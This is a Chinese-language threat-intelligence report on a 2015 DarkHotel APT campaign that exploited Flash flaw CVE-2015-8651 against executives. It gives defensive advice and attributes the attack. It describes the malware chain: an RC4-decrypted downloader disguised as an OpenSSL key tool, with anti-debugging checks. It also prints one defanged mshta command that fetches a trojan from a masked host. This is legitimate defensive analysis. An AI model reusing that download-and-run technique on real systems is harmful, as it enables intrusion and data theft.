境外“暗黑客栈”组织对国内企业高管发起APT攻击

当你启程前往伊萨卡,但愿你的道路漫长,充满奇迹,充满发现——卡瓦菲斯 希腊
以此纪念2015,即将逝去的中国威胁情报元年。

Author:ThreatBook

0x00 摘要


Adobe于12月28日发布了一个应急补丁用于修复Flash 播放器的多个安全漏洞。有线索表明其中之一已被用于APT(高级可持续性)攻击,国外有媒体揣测其攻击目标为国内某著名IT企业(http://www.theregister.co.uk/2015/12/28/adobe_flash_security_update/),微步在线尚未发现任何证据支持此结论。但溯源分析表明确有境外黑客团伙利用此漏洞针对中国及亚洲企业的高管发起APT攻击,此团伙即代号为暗黑客栈(DarkHotel) 的APT攻击组织。现阶段尚不确定此攻击是否有更复杂的背景。微步在线已第一时间向客户发送预警。

我们建议企业高管们立即采取以下措施:

  1. 立即升级Flash播放器;
  2. 不要点击陌生邮件的附件或链接;
  3. 连接酒店WIFI请慎重,收发敏感信息可用移动通信网络。

0x01 威胁事件分析


在Adobe于12月28日发布的19个安全漏洞的应急(OOB)补丁中,CVE-2015-8651 被Adobe 标注为已用于APT攻击。微步在线通过对多宗活跃APT威胁事件的跟踪及对CVE-2015-8651攻击的分析,确定了攻击流及攻击者身份。

通过对捕获的可疑SWF文件进行分析,确认此样本利用了Adobe Flash整数溢出漏洞 (即此次Adobe修复的CVE-2015-8651漏洞)。受攻击者访问此SWF文件后,漏洞利用成功会跳转到下面这段shellcode:

其主要功能是下载一个名为update.exe 的文件到系统的%temp%目录下, 通过RC4解密并且通过ECHO加可执行文件的“MZ”头来构建有效的PE文件,然后运行。

Update.exe约1.3Mb, 具有完整的文件属性,伪装成SSH密钥生成工具:

通过逆向分析发现,木马作者篡改和裁剪了正常的OpenSSL文件,篡改后的版本只提供一个参数:-genkeypair。无论是否传递此参数,木马文件都会首先释放一个公钥在当前目录用于干扰判断,同时进入真正的恶意代码部分。此样本未进行代码混淆,但是采用了多种反调试/反虚拟机技术及字段加密,通过检测各种系统环境来判断是否有反病毒软件及沙箱存在,比如:

Update.exe是一个Trojan Downloader, 利用执行mshta.exe 来下载木马文件,木马文件服务器位于冰岛。形式如下:

C:\Windows\system32\mshta.exe hxxp://****.com/image/read.php…..

0x02 攻击团伙分析


随着对此攻击事件的目标、工具、手法和过程更详细的分析,我们发现其特点和暗黑客栈(Darkhotel)有着非常惊人的一致。

暗黑客栈(Darkhotel)APT攻击团伙的踪迹最早可以追溯到2007年,其从2010年开始更多的利用企业高管在商业旅行中访问酒店网络的时机,进行APT攻击来窃取信息。因此在2014年卡巴斯基发布针对此团队的研究报告时,将其命名为“Darkhotel”。此团伙攻击目标集中在亚太地区开展业务和投资的企业高管(如:CEO、SVP、高管及高级研发人员),攻击的行业包括大型电子制造和通信、投资、国防工业、汽车等。

此团队使用零日漏洞(特别是Flash类型)来进行攻击,并规避最新的防御措施,同时也会盗窃合法的数字证书为后门软件及监听工具进行签名。如果有一个目标已经被有效感染,往往就会从作案点删除他们的工具,进而隐藏自己的活动踪迹。从其行动特点看,具有极高的技术能力及充沛的资源。

我们对此次事件和暗黑客栈(Darkhotel)的特点进行了对比,认为有充足理由认定其就是始作俑者。

0x03 小结


通过此事件,我们再次认识到在万物互联的年代,单纯基于漏洞的防御往往是防不胜防。只要有足够的价值,黑客就有足够的投入和机会攻陷目标。我们需要及时的调整防御思路,平衡安全投入,更多的聚焦威胁,以威胁情报驱动安全体系建设,建立防御、检测、响应及预防一套完整的安全自适应过程。

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐